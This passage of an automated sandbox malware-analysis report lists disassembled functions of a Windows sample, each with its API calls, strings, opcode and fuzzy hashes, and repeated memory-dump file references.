Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Gdip$ClipDeleteRect$BrushCopyCreateFromGraphicsReset
String ID:
API String ID: 2296537269-0
Opcode ID: 651bc4e712e5d57672b930c250f3e00eca8197ad4fceaa9a22bbc3aa95670b54
Instruction ID: 9f69f649c0531c7d01d09b5a7e39bf7e1676fda4b2c47b955fa986feb152432a
Opcode Fuzzy Hash: 651bc4e712e5d57672b930c250f3e00eca8197ad4fceaa9a22bbc3aa95670b54
Instruction Fuzzy Hash: B6A14AB1A0121AEFDF14DF94D884AEEBBB5FF48314F54811EE905A7240DB38AD51CBA4

Function 004651B0 Relevance: 9.2, APIs: 6, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 095afa256efd5dbca87d9416f12f768b5d165c3c4a67580ae227f0d52a663c23
Instruction ID: cfa0aa764b4b16fe6a4feb511de033937e6a878ff39e0f7a89154c9f74056f98
Opcode Fuzzy Hash: 095afa256efd5dbca87d9416f12f768b5d165c3c4a67580ae227f0d52a663c23
Instruction Fuzzy Hash: C2615BB1214702AFD704DF68C981AABB7E9BF98704F004A1DF94587351EB34EC15CBA6

Function 004309B0 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 412filewindowCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,00000401,?,00000401), ref: 00430D25
PostMessageW.USER32(?,00000401,00000000,00000000), ref: 00430E38

Strings

%p|%s|%u, xrefs: 00430BAD
T9N, xrefs: 00430E0E
disable_resize, xrefs: 00430AFE

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DeleteFileMessagePost
String ID: %p|%s|%u$T9N$disable_resize
API String ID: 3800956871-1662393167
Opcode ID: 1e32038507ba1feec5d02d36489da2690e7d91bd0bd9fe5c43df5f6d7e5b5a3e
Instruction ID: b9b9ea4d7a6a2712e875ddc8091bfa44c6a79144ca5a17814dea005c11a588e5
Opcode Fuzzy Hash: 1e32038507ba1feec5d02d36489da2690e7d91bd0bd9fe5c43df5f6d7e5b5a3e
Instruction Fuzzy Hash: 42F189756043009FC714DF19C881A5BB7E5EF89324F148A5EF9999B352C738ED02CBAA

Function 004460A0 Relevance: 9.1, APIs: 6, Instructions: 135COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,00000000,00000000,?,?,?,00446A6D), ref: 004460DF
CharNextW.USER32(00000000,?,00000000,00000000,?,?,?,00446A6D), ref: 004460F7
CharNextW.USER32(00000000,?,00000000,00000000,?,?,?,00446A6D), ref: 00446110
CharNextW.USER32(75A7A7D0,?,00000000,00000000,?,?,?,00446A6D), ref: 00446117
CharNextW.USER32(00000000,?,00000000,00000000,?,?,?,00446A6D), ref: 00446171

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: a0189b3108c05be30ba86b9b69e67bae54b5a3f49c9514b0386e1d8119a55a9c
Instruction ID: 37e5b94376f02e1ba7737fbb8c4a9f0002ba02506704fd020d02e49866831bab
Opcode Fuzzy Hash: a0189b3108c05be30ba86b9b69e67bae54b5a3f49c9514b0386e1d8119a55a9c
Instruction Fuzzy Hash: 4041EF312002128BE7249F38DC85577B3E5FF6A311BA5096ED889C3356EB39D881C79A

Function 00467000 Relevance: 9.1, APIs: 6, Instructions: 127fileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0046706A

Part of subcall function 0047E760: LoadLibraryW.KERNEL32(Kernel32.dll,?,?,0046707B,C1DE166F,?,?), ref: 0047E792
Part of subcall function 0047E760: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0047E7AB
Part of subcall function 0047E760: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 0047E7BA

DragQueryFileW.SHELL32 ref: 00467090
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 004670BC
GetFileAttributesW.KERNEL32(?), ref: 004670C7
DragFinish.SHELL32(?), ref: 0046715E
FreeLibrary.KERNEL32(?), ref: 0046718F

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DragFile$AddressLibraryProcQuery$AttributesFinishFreeLoad_memset
String ID:
API String ID: 1233839673-0
Opcode ID: 5f1f37073f9b8ca8f80bbc28c05ec2ce8b212cbc21f5cd5257393726376d4e1c
Instruction ID: 4831619fe3ed6127199eaad4f84098876d4c67231036adb00ad41f0a3a1ba1cb
Opcode Fuzzy Hash: 5f1f37073f9b8ca8f80bbc28c05ec2ce8b212cbc21f5cd5257393726376d4e1c
Instruction Fuzzy Hash: 7C4191711083419BD324EF29CC45B9BB7E8AB85328F104A1EF158973D1EB78D545CB9A

Function 0042EA50 Relevance: 9.1, APIs: 6, Instructions: 120windowmemoryCOMMON

Download Yara Rule

APIs

GdipGetImageWidth.GDIPLUS(448904C4,0042ECF2,00000000,?,?,?,0042ECF2,?), ref: 0042EA74
GdipGetImageHeight.GDIPLUS(448904C4,?,448904C4,0042ECF2,00000000,?,?,?,0042ECF2,?), ref: 0042EA8B
GdipAlloc.GDIPLUS(00000010,?,448904C4,?,448904C4,0042ECF2,00000000,?,?,?,0042ECF2,?), ref: 0042EA9A
GdipCreateBitmapFromScan0.GDIPLUS(0042ECF2,?,00000000,0026200A,00000000,?,00000010,?,448904C4,?,448904C4,0042ECF2,00000000,?,?,?), ref: 0042EAC1
GdipBitmapGetPixel.GDIPLUS(448904C4,00000000,00000000,?,0042ECF2,?,00000000,0026200A,00000000,?,00000010,?,448904C4,?,448904C4,0042ECF2), ref: 0042EAF4
GdipBitmapSetPixel.GDIPLUS(?,00000000,00000000,FF000000,448904C4,00000000,00000000,?,0042ECF2,?,00000000,0026200A,00000000,?,00000010,?), ref: 0042EB3D

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Gdip$Bitmap$ImagePixel$AllocCreateFromHeightScan0Width
String ID:
API String ID: 589066873-0
Opcode ID: e733b6b687a4c5f3fea4d2c4b0e17155b2e366daab84b252ef7d41c16ad21c0b
Instruction ID: 06c8f380e6a1397b3655f2985a67f7226a17fe18fdcafde15b48169c2821b68d
Opcode Fuzzy Hash: e733b6b687a4c5f3fea4d2c4b0e17155b2e366daab84b252ef7d41c16ad21c0b
Instruction Fuzzy Hash: AD31B371B00129AF9B10DF5AD881DAFBBB8FB85714B14819FF8099B205D234AD42CBA4

Function 0043E180 Relevance: 9.1, APIs: 6, Instructions: 93COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0043E1B6
_memset.LIBCMT ref: 0043E1C9
GetCurrentProcess.KERNEL32 ref: 0043E1FE
_memset.LIBCMT ref: 0043E232
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0043E247
WTSQuerySessionInformationW.WTSAPI32(00000000,000000FF,00000004,?,?), ref: 0043E270

Part of subcall function 0043DBB0: GetSystemDirectoryW.KERNEL32(?,00000103), ref: 0043DBBF

Part of subcall function 0043D9F0: _memset.LIBCMT ref: 0043DA3B
Part of subcall function 0043D9F0: ExpandEnvironmentStringsW.KERNEL32(%SystemDrive%,?,00000103), ref: 0043DA5A
Part of subcall function 0043D9F0: __wcsnicmp.LIBCMT ref: 0043DA75
Part of subcall function 0043D9F0: _memset.LIBCMT ref: 0043DA9F
Part of subcall function 0043D9F0: ExpandEnvironmentStringsW.KERNEL32(%windir%,?,00000103), ref: 0043DAB8
Part of subcall function 0043D9F0: __wcsicoll.LIBCMT ref: 0043DAC2
Part of subcall function 0043D9F0: _memset.LIBCMT ref: 0043DADF
Part of subcall function 0043D9F0: ExpandEnvironmentStringsW.KERNEL32(%SystemRoot%,?,00000103), ref: 0043DAF8
Part of subcall function 0043D9F0: __wcsicoll.LIBCMT ref: 0043DB02
Part of subcall function 0043D9F0: _memset.LIBCMT ref: 0043DB1F
Part of subcall function 0043D9F0: ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000103), ref: 0043DB38
Part of subcall function 0043D9F0: __wcsnicmp.LIBCMT ref: 0043DB5A
Part of subcall function 0043D9F0: __wcsicoll.LIBCMT ref: 0043DB73

Part of subcall function 0043DC10: SetEnvironmentVariableW.KERNEL32(windir,?), ref: 0043DC3A
Part of subcall function 0043DC10: SetEnvironmentVariableW.KERNEL32(SystemRoot,?), ref: 0043DC42
Part of subcall function 0043DC10: _memset.LIBCMT ref: 0043DC5A
Part of subcall function 0043DC10: SetEnvironmentVariableW.KERNEL32(ComSpec,?), ref: 0043DD0A
Part of subcall function 0043DC10: SetEnvironmentVariableW.KERNEL32(SystemDrive,?), ref: 0043DD21

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Environment_memset$ExpandStringsVariable$__wcsicoll$__wcsnicmp$CurrentDirectoryFileInformationModuleNameProcessQuerySessionSystem
String ID:
API String ID: 3875749331-0
Opcode ID: 60b10111db69f7b28c168dd6bc0877aae6462ec510c7536585a07ad56d65a0f0
Instruction ID: efeaf43171ea69977cfcb36080cd1cd6059f6c5ca92097290a5c2233e868a2ad
Opcode Fuzzy Hash: 60b10111db69f7b28c168dd6bc0877aae6462ec510c7536585a07ad56d65a0f0
Instruction Fuzzy Hash: 43314B719012189ADB20EF519C45BEF73ADAF4C704F0011EEB904672C2DA795E95CB9D

Function 0047A200 Relevance: 9.1, APIs: 6, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(C1DE166F), ref: 0047A228
HeapLock.KERNEL32(00000000), ref: 0047A24E
HeapWalk.KERNEL32(00000000,?), ref: 0047A268
HeapWalk.KERNEL32(00000000,?), ref: 0047A29C
HeapUnlock.KERNEL32(00000000), ref: 0047A2CF

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Heap$Walk$LockProcessUnlock
String ID:
API String ID: 2227978497-0
Opcode ID: b186b2d2852414c0700dae0e564aef4e09316f9ac62cb7bd4439df536863820c
Instruction ID: 30f15de8d54f4eeb7fec28a7866d4a092ff4021abed2c4903b3fa11efb473330
Opcode Fuzzy Hash: b186b2d2852414c0700dae0e564aef4e09316f9ac62cb7bd4439df536863820c
Instruction Fuzzy Hash: 8321E0751093419FD315CF28E884B9FB7E8EB85720F40863EF80192391D73A9849CBAB

Function 00441500 Relevance: 9.1, APIs: 6, Instructions: 73COMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00441542
ClientToScreen.USER32(?,?), ref: 00441550
GetParent.USER32(?), ref: 00441556
ScreenToClient.USER32(00000000,?), ref: 0044156E
ScreenToClient.USER32(00000000,?), ref: 00441579
MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00441596

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ClientScreen$MoveParentWindow
String ID:
API String ID: 2420994850-0
Opcode ID: b6fc4fd4b3a63efd8736bd2de387da4beb1869ca54a518a66e36e13add5e1470
Instruction ID: 7051f1bd903fbf902461b88305c9c51d55bdfa7f3c5471343efc996e6fdfc7a6
Opcode Fuzzy Hash: b6fc4fd4b3a63efd8736bd2de387da4beb1869ca54a518a66e36e13add5e1470
Instruction Fuzzy Hash: 1C21CF75A05219AF9B04DFA9DC84CEFB7BDFB88310B008559E90597314DB74ED40CBA4

Function 00460280 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 321threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 004602AB
EnterCriticalSection.KERNEL32(?), ref: 004602BF
LeaveCriticalSection.KERNEL32(?), ref: 004602D7

Strings

IDS_NO_DATA, xrefs: 0046053D
FileSmasher\historydlg.xml, xrefs: 0046031A

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CriticalSection$CurrentEnterLeaveThread
String ID: FileSmasher\historydlg.xml$IDS_NO_DATA
API String ID: 2351996187-3197532833
Opcode ID: 4b360783dfd6be0138a405e2dc792872d13b4bf95278baa557200a02fe262fb7
Instruction ID: 028c4074a9e95867e078abe2bb7ba8bf10d6841b7c620acf430e1bf6beca8d12
Opcode Fuzzy Hash: 4b360783dfd6be0138a405e2dc792872d13b4bf95278baa557200a02fe262fb7
Instruction Fuzzy Hash: AEB1A4712083419FE710DB65CC41B5B77E8AF89704F14461EFA45AB2C2DB78ED05CB9A

Function 0048D484 Relevance: 9.1, APIs: 6, Instructions: 71threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 0048D4B5
__calloc_crt.LIBCMT ref: 0048D4C1
__getptd.LIBCMT ref: 0048D4CE
CreateThread.KERNEL32(?,?,0048D401,00000000,?,00430D90), ref: 0048D505
GetLastError.KERNEL32(?,?,004307E1,00000000,00000000,00430D90,?,00000000,00000000,?,?,?), ref: 0048D50F
__dosmaperr.LIBCMT ref: 0048D527

Part of subcall function 0048F35E: __getptd_noexit.LIBCMT ref: 0048F35E

Part of subcall function 0048B3CC: __decode_pointer.LIBCMT ref: 0048B3D7

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
String ID:
API String ID: 1803633139-0
Opcode ID: 732d00a776afa64e783160eac40d830e23678a2e1239caf58a9414dc2a4a6efd
Instruction ID: 8512637edd71d9757fd71981eaa3752eaf1430059a7f4bc769326c77e5390c09
Opcode Fuzzy Hash: 732d00a776afa64e783160eac40d830e23678a2e1239caf58a9414dc2a4a6efd
Instruction Fuzzy Hash: 08110472901209BFCF10BFA5DC8289F7BA4EF04728B10083FF50192191DB399E15C7A8

Function 004822CA Relevance: 9.1, APIs: 6, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 004822FD
GetParent.USER32(?), ref: 0048230B
GetParent.USER32(?), ref: 0048231E
GetLastActivePopup.USER32(?), ref: 0048232F
IsWindowEnabled.USER32(?), ref: 00482343
EnableWindow.USER32(?,00000000), ref: 00482356

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: 73345cae9ea0cf933a0d12b9e84a3375943fbf52a1ba92b6db29bd6ac628cbf0
Instruction ID: 9615c52491f184c7a1cfc2fb0684b042f474b33139c70dd3ec826485e9417237
Opcode Fuzzy Hash: 73345cae9ea0cf933a0d12b9e84a3375943fbf52a1ba92b6db29bd6ac628cbf0
Instruction Fuzzy Hash: 19118F32601221A7CB323A799B54B6F729C6F55B64F150A66ED04E7340DBBCCC0293AD

Function 004401E0 Relevance: 9.0, APIs: 6, Instructions: 37COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 004401E9
GetDeviceCaps.GDI32(00000000,00000058), ref: 004401F4
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00440200
ReleaseDC.USER32(00000000,00000000), ref: 0044020C
MulDiv.KERNEL32(00000000,00000000,000009EC), ref: 00440224
MulDiv.KERNEL32(?,?,000009EC), ref: 00440235

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 7fce79aba2f8d0de5c00698e69a850d391c1119099c3b9e6a9e95ee31a69ccbd
Instruction ID: 462b78027e15ed6f0a95b7f2c6649df6c4f76bdb0fb576b7a7b5105730ddadd1
Opcode Fuzzy Hash: 7fce79aba2f8d0de5c00698e69a850d391c1119099c3b9e6a9e95ee31a69ccbd
Instruction Fuzzy Hash: 45F01D75A41214BFE710EFA8DC4AE5E7FBCEB19712F004269FA04A7280DA709D04CFA5

Function 00440180 Relevance: 9.0, APIs: 6, Instructions: 37COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00440189
GetDeviceCaps.GDI32(00000000,00000058), ref: 00440194
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004401A0
ReleaseDC.USER32(00000000,00000000), ref: 004401AC
MulDiv.KERNEL32(000009EC,?,?), ref: 004401C4
MulDiv.KERNEL32(000009EC,?,?), ref: 004401D5

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 6c51284917fb886e15575db18ed4e44bbd2cfc635387cabda6c6f8100cfacc11
